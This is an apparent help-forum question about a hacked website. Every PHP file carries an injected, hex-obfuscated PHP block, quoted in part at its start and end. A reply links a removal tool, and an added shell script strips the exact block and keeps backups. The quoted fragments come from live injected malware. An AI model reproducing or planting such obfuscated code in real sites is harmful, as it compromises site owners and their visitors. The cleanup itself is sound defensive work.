Website hacked, how to remove malicious code with SED / GREP
Question
A website of mine is hacked. In every php file a line of code is added. I won't post the complete code here, but it starts with:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yudqgxmnlr =
and ends with:
$gzagexgpdc=substr($yudqgxmnlr,(34129-24016),(83-71)); $gzagexgpdc($xarchajboj, $ukumkvvgai, NULL); $gzagexgpdc=$ukumkvvgai; $gzagexgpdc=(759-638); $yudqgxmnlr=$gzagexgpdc-1; ?>
I've tried finding and replacing with some ssh commands, but it doesn't seem to work. (Read: my lack of ssh knowledge gets in the way).
This is my latest attempt:
sed -i '<?php if(!isset*gzagexgpdc-1; ?>//g’ *.php
Can anybody help me?
Recommended answer
You can try this: https://github.com/daniyalahmadk/RMCI
You just need to put that code in the box and hit submit; it will search the files for the code and remove it all at once.
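A shell-only way to do the cleanup the question asks for, as an added example that is not part of the original question or answer. It assumes the start and end strings quoted in the question are identical in every infected file; the names `INJ_START`, `INJ_END`, `strip_block` and `clean_tree` are made up for this example.

```shell
#!/bin/sh
# Start and end of the injected block, copied from the question.
# Assumption: both strings are byte-identical in every infected file.
INJ_START='<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"]))'
INJ_END='$yudqgxmnlr=$gzagexgpdc-1; ?>'
export INJ_START INJ_END   # awk reads them via ENVIRON, which keeps backslashes literal

# strip_block FILE: print FILE with each INJ_START...INJ_END span removed.
# awk's index() compares literal text, so the \ $ [ ( in the payload need no
# regex escaping (the usual reason a hand-written sed pattern fails here).
strip_block() {
  awk '
    BEGIN { s = ENVIRON["INJ_START"]; e = ENVIRON["INJ_END"] }
    {
      line = $0; hit = 0
      while ((i = index(line, s)) > 0) {
        rest = substr(line, i + length(s))
        j = index(rest, e)
        if (j == 0) break            # start marker without end marker: leave as is
        line = substr(line, 1, i - 1) substr(rest, j + length(e))
        hit = 1
      }
      if (!(hit && line == "")) print line   # drop a line only if the block was all of it
    }' "$1"
}

# clean_tree DIR: clean every *.php under DIR that contains INJ_START.
# The original is kept as FILE.infected; cleaned file names are printed.
clean_tree() {
  find "$1" -type f -name '*.php' -exec grep -lF -e "$INJ_START" {} + |
  while IFS= read -r f; do
    cp -p "$f" "$f.infected" && strip_block "$f.infected" > "$f" && echo "$f"
  done
}
```

Run it as `clean_tree /path/to/site`, diff a few files against their `.infected` copies, then move the backups out of the web root.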